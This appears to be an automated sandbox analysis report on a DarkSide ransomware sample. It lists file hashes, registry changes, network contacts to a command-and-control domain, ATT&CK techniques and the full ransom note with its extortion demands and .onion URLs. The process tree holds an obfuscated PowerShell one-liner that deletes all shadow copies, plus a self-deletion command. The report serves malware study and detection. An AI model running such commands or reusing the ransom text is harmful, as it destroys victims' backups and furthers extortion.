darkside | 0f808fd3ecf9d722aafeee46b57aad4d07f39c98be6f6148be979ed470cf0a99

Resubmissions

27/01/2024, 19:37 UTC

240127-yb5pksafd3 10

27/01/2024, 19:36 UTC

240127-ybqwesafc2 10

12/05/2021, 15:56 UTC

210512-db4t7vmwas 10

Analysis

max time kernel
139s
max time network
144s
platform
windows7_x64
resource
win7v20210410
submitted
12/05/2021, 15:56 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Size

59KB
MD5

cfcfb68901ffe513e9f0d76b17d02f96
SHA1

766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
SHA512

0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ConvertToClear.crw => C:\Users\Admin\Pictures\ConvertToClear.crw.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertToClear.crw.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

Deletes itself 1 IoCs

pid	Process
2844	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443"	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
632	powershell.exe
632	powershell.exe
788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeSecurityPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeTakeOwnershipPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeLoadDriverPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeSystemProfilePrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeSystemtimePrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeProfSingleProcessPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeIncBasePriorityPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeCreatePagefilePrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeBackupPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeRestorePrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeShutdownPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeDebugPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeSystemEnvironmentPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeRemoteShutdownPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeUndockPrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeManageVolumePrivilege	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: 33	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: 34	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: 35	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Token: SeDebugPrivilege	632	powershell.exe
Token: SeBackupPrivilege	1592	vssvc.exe
Token: SeRestorePrivilege	1592	vssvc.exe
Token: SeAuditPrivilege	1592	vssvc.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 788 wrote to memory of 632	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	32
PID 788 wrote to memory of 632	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	32
PID 788 wrote to memory of 632	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	32
PID 788 wrote to memory of 632	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	32
PID 788 wrote to memory of 2844	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	38
PID 788 wrote to memory of 2844	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	38
PID 788 wrote to memory of 2844	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	38
PID 788 wrote to memory of 2844	788	17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe	38

C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
"C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:632
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\17139A~1.EXE >> NUL
  2⤵
  - Deletes itself
  PID:2844

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1592

Network

DNS

securebestapp20.com

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

Remote address:

8.8.8.8:53

Request

securebestapp20.com

IN A

Response

securebestapp20.com

IN A

185.105.109.19
DNS

12.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

12.0.7.10.in-addr.arpa

IN PTR

Response
DNS

15.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.0.7.10.in-addr.arpa

IN PTR

Response
DNS

11.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.0.7.10.in-addr.arpa

IN PTR

Response
DNS

36.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

36.0.7.10.in-addr.arpa

IN PTR

Response
DNS

19.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.0.7.10.in-addr.arpa

IN PTR

Response
DNS

25.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.0.7.10.in-addr.arpa

IN PTR

Response
DNS

24.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.0.7.10.in-addr.arpa

IN PTR

Response
DNS

34.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.0.7.10.in-addr.arpa

IN PTR

Response
DNS

28.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.0.7.10.in-addr.arpa

IN PTR

Response
DNS

29.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.0.7.10.in-addr.arpa

IN PTR

Response
DNS

1.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.0.7.10.in-addr.arpa

IN PTR

Response
DNS

31.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.0.7.10.in-addr.arpa

IN PTR

Response
DNS

33.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.0.7.10.in-addr.arpa

IN PTR

Response
DNS

41.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.0.7.10.in-addr.arpa

IN PTR

Response
DNS

38.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

38.0.7.10.in-addr.arpa

IN PTR

Response
DNS

40.0.7.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.0.7.10.in-addr.arpa

IN PTR

Response

185.105.109.19:443

securebestapp20.com

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

152 B
3
185.105.109.19:443

securebestapp20.com

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

152 B
3

8.8.8.8:53

securebestapp20.com

dns

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe

65 B
81 B
1
1

DNS Request

securebestapp20.com

DNS Response

185.105.109.19
10.7.0.38:56666

112 B
1
10.7.0.11:51655

112 B
1
10.7.0.15:57470

112 B
1
10.7.0.12:63689

112 B
1
10.7.0.40:63185

112 B
1
10.7.0.41:50084

112 B
1
10.7.0.24:61150

112 B
1
10.7.0.29:64930

112 B
1
8.8.8.8:53

12.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

12.0.7.10.in-addr.arpa
8.8.8.8:53

15.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

15.0.7.10.in-addr.arpa
8.8.8.8:53

11.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

11.0.7.10.in-addr.arpa
8.8.8.8:53

36.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

36.0.7.10.in-addr.arpa
8.8.8.8:53

19.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

19.0.7.10.in-addr.arpa
8.8.8.8:53

25.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

25.0.7.10.in-addr.arpa
10.7.0.12:5355

112 B
1
10.7.0.19:5355

112 B
1
8.8.8.8:53

24.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

24.0.7.10.in-addr.arpa
8.8.8.8:53

34.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

34.0.7.10.in-addr.arpa
8.8.8.8:53

28.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

28.0.7.10.in-addr.arpa
10.7.0.15:5355

112 B
1
8.8.8.8:53

29.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

29.0.7.10.in-addr.arpa
10.7.0.24:5355

112 B
1
10.7.0.25:5355

112 B
1
8.8.8.8:53

1.0.7.10.in-addr.arpa

dns

67 B
67 B
1
1

DNS Request

1.0.7.10.in-addr.arpa
10.7.0.34:5355

112 B
1
10.7.0.29:5355

112 B
1
8.8.8.8:53

31.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

31.0.7.10.in-addr.arpa
8.8.8.8:53

33.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

33.0.7.10.in-addr.arpa
10.7.0.11:5355

112 B
1
8.8.8.8:53

41.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

41.0.7.10.in-addr.arpa
8.8.8.8:53

38.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

38.0.7.10.in-addr.arpa
8.8.8.8:53

40.0.7.10.in-addr.arpa

dns

68 B
68 B
1
1

DNS Request

40.0.7.10.in-addr.arpa
10.7.0.36:5355

112 B
1
10.7.0.31:5355

112 B
1
10.7.0.41:5355

112 B
1
10.7.0.38:5355

112 B
1
10.7.0.33:5355

112 B
1
10.7.0.40:5355

112 B
1
10.7.0.28:5355

112 B
1
10.7.0.21:65082

112 B
1

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/632-66-0x000000001AA74000-0x000000001AA76000-memory.dmp

Filesize
8KB

Download
memory/632-63-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/632-64-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

Filesize
4KB

Download
memory/632-65-0x000000001AA70000-0x000000001AA72000-memory.dmp

Filesize
8KB

Download
memory/632-67-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/632-68-0x00000000026F0000-0x00000000026F1000-memory.dmp

Filesize
4KB

Download
memory/632-69-0x000000001C130000-0x000000001C131000-memory.dmp

Filesize
4KB

Download
memory/632-70-0x000000001C200000-0x000000001C201000-memory.dmp

Filesize
4KB

Download
memory/632-62-0x000007FEFB8F1000-0x000007FEFB8F3000-memory.dmp

Filesize
8KB

Download
memory/788-60-0x00000000757E1000-0x00000000757E3000-memory.dmp

Filesize
8KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.